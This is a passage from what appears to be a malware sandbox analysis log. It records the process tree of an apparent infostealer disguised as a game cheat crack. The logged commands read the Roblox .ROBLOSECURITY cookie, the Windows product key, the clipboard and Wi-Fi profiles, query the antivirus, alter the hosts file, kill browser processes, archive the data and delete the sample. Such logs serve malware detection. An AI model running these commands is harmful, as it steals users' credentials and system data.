  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3908
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2744
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4120
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:980
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:936
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3056
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1704
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1276
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4252
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\spcgW.zip" *"
    3⤵
    PID:4332
  - - C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\spcgW.zip" *
      4⤵
      Executes dropped EXE
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2564
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:4628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5160
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1532
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4572
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5736
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5504
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2252
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5976
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4152
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1900
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2868
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5236
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3508"
    3⤵
    PID:4220
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3508
      4⤵
      Kills process with taskkill
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1632"
    3⤵
    PID:4120
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1632
      4⤵
      Kills process with taskkill
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3508"
    3⤵
    PID:5708
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3508
      4⤵
      Kills process with taskkill
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1696"
    3⤵
    PID:5360
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1696
      4⤵
      Kills process with taskkill
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1632"
    3⤵
    PID:3776
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1632
      4⤵
      Kills process with taskkill
      PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1696"
    3⤵
    PID:400
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1696
      4⤵
      Kills process with taskkill
      PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4300"
    3⤵
    PID:2176
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4300
      4⤵
      Kills process with taskkill
      PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4300"
    3⤵
    PID:2856
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4300
      4⤵
      Kills process with taskkill
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4484"
    3⤵
    PID:5332
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4484
      4⤵
      Kills process with taskkill
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4484"
    3⤵
    PID:1728
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4484
      4⤵
      Kills process with taskkill
      PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3868"
    3⤵
    PID:2168
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3868
      4⤵
      Kills process with taskkill
      PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3868"
    3⤵
    PID:2684
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3868
      4⤵
      Kills process with taskkill
      PID:6072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5080"
    3⤵
    PID:5128
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5080
      4⤵
      Kills process with taskkill
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5080"
    3⤵
    PID:6116
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5080
      4⤵
      Kills process with taskkill
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1920"
    3⤵
    PID:5508
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1920
      4⤵
      Kills process with taskkill
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1920"
    3⤵
    PID:5280
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1920
      4⤵
      Kills process with taskkill
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4280"
    3⤵
    PID:1768
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4280
      4⤵
      Kills process with taskkill
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4280"
    3⤵
    PID:4564
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4280
      4⤵
      Kills process with taskkill
      PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 960"
    3⤵
    PID:5256
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 960
      4⤵
      Kills process with taskkill
      PID:5264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 960"
    3⤵
    PID:5244
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 960
      4⤵
      Kills process with taskkill
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
    3⤵
    PID:1928
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4640
      4⤵
      Kills process with taskkill
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
    3⤵
    PID:5488
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4640
      4⤵
      Kills process with taskkill
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 868"
    3⤵
    PID:2780
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 868
      4⤵
      Kills process with taskkill
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 868"
    3⤵
    PID:1008
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 868
      4⤵
      Kills process with taskkill
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4356"
    3⤵
    PID:3856
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4356
      4⤵
      Kills process with taskkill
      PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4356"
    3⤵
    PID:4220
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4356
      4⤵
      Kills process with taskkill
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5808
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5708
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\J4n18.zip" *"
    3⤵
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI21962\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\J4n18.zip" *
      4⤵
      Executes dropped EXE
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:6008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:5820
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:4524

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:388

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\spcgW.zip" -tzip
1⤵
- Suspicious use of FindShellTrayWindow
PID:4508

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\spcgW.zip"
1⤵
- Suspicious use of FindShellTrayWindow
PID:4232

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:936
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.0.1579322073\1171422693" -parentBuildID 20230214051806 -prefsHandle 1772 -prefMapHandle 1764 -prefsLen 22341 -prefMapSize 235161 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6bbeace-3be1-40f3-ac05-56e8cb202e3b} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 1852 213b762e558 gpu
    3⤵
    PID:4164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.1.105291476\15402119" -parentBuildID 20230214051806 -prefsHandle 2300 -prefMapHandle 2288 -prefsLen 22341 -prefMapSize 235161 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07dd8141-e35b-4406-821d-73d2510a308d} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 2324 213aaa8a558 socket
    3⤵
    - Checks processor information in registry
    PID:32
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.2.515429981\218499733" -childID 1 -isForBrowser -prefsHandle 3032 -prefMapHandle 3168 -prefsLen 22802 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d24e164-ff32-4838-b0d2-c985c6357c68} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 3228 213bb433258 tab
    3⤵
    PID:4848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.3.390042432\1726693495" -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3668 -prefsLen 28203 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c035388d-44b0-407e-948c-4582407970e2} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 3612 213bc3a7a58 tab
    3⤵
    PID:3564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.4.1616375696\500801280" -childID 3 -isForBrowser -prefsHandle 4980 -prefMapHandle 4300 -prefsLen 28282 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {939c6df0-bfc6-4720-9a54-37c52f142414} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 4988 213bedb8e58 tab
    3⤵
    PID:3972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.5.1772861166\2023723198" -childID 4 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 28282 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8b428ae-1737-4867-9ca2-77e11acbe874} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 5004 213bedba058 tab
    3⤵
    PID:3668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.6.1981627628\1542072147" -childID 5 -isForBrowser -prefsHandle 5304 -prefMapHandle 5300 -prefsLen 28282 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb97488e-becc-4cdc-b82b-4050942d61ba} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 5356 213bedba958 tab
    3⤵
    PID:868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3516.7.186795942\1977112371" -childID 6 -isForBrowser -prefsHandle 4268 -prefMapHandle 3556 -prefsLen 28282 -prefMapSize 235161 -jsInitHandle 1364 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463dff9b-5891-42a9-929e-ec3375a0c32e} 3516 "\\.\pipe\gecko-crash-server-pipe.3516" 4720 213bf975758 tab
    3⤵
    PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb5286ab58,0x7ffb5286ab68,0x7ffb5286ab78
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:2
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:2976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:8
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:1
  2⤵
  PID:3988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2052,i,4243021939371801142,7661335253989840941,131072 /prefetch:1
  2⤵
  PID:2004
- C:\Program Files\Google\Chrome\Application\chrome.exe
